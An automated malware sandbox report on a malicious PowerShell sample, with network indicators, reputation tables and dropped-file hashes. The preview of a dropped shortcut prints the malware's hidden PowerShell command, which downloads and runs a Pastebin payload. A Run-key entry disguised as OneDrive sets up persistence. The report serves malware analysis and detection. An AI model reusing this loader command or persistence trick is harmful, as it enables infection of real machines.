                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://0.discord.com/powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.vpowershell.exe, 0000000C.00000002.1869396878.000002019C5D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://pastebin.compowershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48133C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://pastebin.compowershell.exe, 00000007.00000002.1800661112.000001D48038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.20.3.235
                                                          		pastebin.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          162.159.136.232
                                                          		discord.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          185.199.110.133
                                                          		raw.githubusercontent.comNetherlands
                                                          		54113FASTLYUStrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1534226
                                                          Start date and time:2024-10-15 17:57:01 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 23s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:cr_asm_atCAD.ps1
                                                          Detection:MAL
                                                          Classification:mal84.troj.evad.winPS1@16/15@4/3
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 61%
                                                          • Number of executed functions: 21
                                                          • Number of non-executed functions: 8
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 2944 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 5180 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • VT rate limit hit for: cr_asm_atCAD.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          11:58:00API Interceptor297x Sleep call for process: powershell.exe modified
                                                          17:58:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                          17:58:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.20.3.235vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          sostener.vbsGet hashmaliciousNjratBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          sostener.vbsGet hashmaliciousRemcosBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                          • pastebin.com/raw/NsQ5qTHr
                                                          Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                          • pastebin.com/raw/NsQ5qTHr
                                                          162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                          • discord.com/administrator/index.php

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          discord.comvF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.136.232
                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.136.232
                                                          VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 162.159.138.232
                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.137.232
                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                          • 162.159.128.233
                                                          HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                          • 162.159.136.232
                                                          xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.138.232
                                                          steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.138.232
                                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.138.232
                                                          cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                          • 162.159.138.232
                                                          raw.githubusercontent.comna.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 185.199.109.133
                                                          65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 185.199.109.133
                                                          Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                          • 185.199.110.133
                                                          RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                          • 185.199.109.133
                                                          Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                          • 185.199.108.133
                                                          Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                          • 185.199.109.133
                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • 185.199.108.133
                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • 185.199.110.133
                                                          VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 185.199.108.133
                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          • 185.199.108.133
                                                          pastebin.comvF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • 104.20.3.235
                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • 104.20.4.235
                                                          VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 172.67.19.24
                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          • 104.20.3.235
                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                          • 104.20.3.235
                                                          HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                          • 104.20.4.235
                                                          xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.19.24
                                                          steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.19.24
                                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                          • 104.20.3.235
                                                          gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                          • 172.67.19.24

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUScyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.37.123
                                                          https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          Play_New_001min 11sec _ ATT20283(David.dekraker).htmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          http://bryrs.harvis.cloud/4OtSUE17531Obzq1449ntesnrecvv32137XDTBTTHBDZFIWJU1475FZMF19147t17Get hashmaliciousPhisherBrowse
                                                          • 188.114.97.3
                                                          original (6).emlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          Comprovativo_Outubro_oddigsvl_09-10-2024_53.vbs.zipGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                          • 162.159.140.237
                                                          CLOUDFLARENETUScyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.37.123
                                                          https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          Play_New_001min 11sec _ ATT20283(David.dekraker).htmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          http://bryrs.harvis.cloud/4OtSUE17531Obzq1449ntesnrecvv32137XDTBTTHBDZFIWJU1475FZMF19147t17Get hashmaliciousPhisherBrowse
                                                          • 188.114.97.3
                                                          original (6).emlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          Comprovativo_Outubro_oddigsvl_09-10-2024_53.vbs.zipGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                          • 162.159.140.237
                                                          FASTLYUSna.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 185.199.109.133
                                                          Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                          • 199.232.196.209
                                                          Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                          • 199.232.192.209
                                                          Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                          • 199.232.196.209
                                                          65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 185.199.109.133
                                                          Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                          • 185.199.110.133
                                                          proof of payment.jsGet hashmaliciousSTRRATBrowse
                                                          • 199.232.196.209
                                                          RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                          • 185.199.109.133
                                                          Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                          • 185.199.108.133
                                                          Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                          • 185.199.108.133

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ena.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133
                                                          GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          • 104.20.3.235
                                                          • 162.159.136.232
                                                          • 185.199.110.133

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):4.527272298423835
                                                          Encrypted:false
                                                          SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                          MD5:724AA21828AD912CB466E3B0A79F478B
                                                          SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                          SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                          SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                          Malicious:true
                                                          Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.890472898059848
                                                          Encrypted:false
                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllul5L:NllU5
                                                          MD5:9C944FDDA1A47DD1849803932ABE8B44
                                                          SHA1:E37C1C44EE1A5693B5B7221687567926DE613749
                                                          SHA-256:F5C2F1A4713AC3F802F02D0B658A300ABD41EB7455C87485043E0FB55B445770
                                                          SHA-512:EC259F45550DC51358C308BCA433FEBC33BFADD6C3C1DF0DC97F4A2DFF855F1D5E009C642E9FC7E5BB1934060CAE77306002ED8006CD943BBC5E594BAE778746
                                                          Malicious:false
                                                          Preview:@...e...............................[.. .............@..........

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2iojgyl4.fud.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_354jrdum.b1l.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aq1unlgx.wic.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arvojhbm.4s5.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_geqejfma.ddx.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i31ic1rg.rr3.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igdi033w.a1d.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhfvf35r.0zj.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzhtbiif.lfu.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
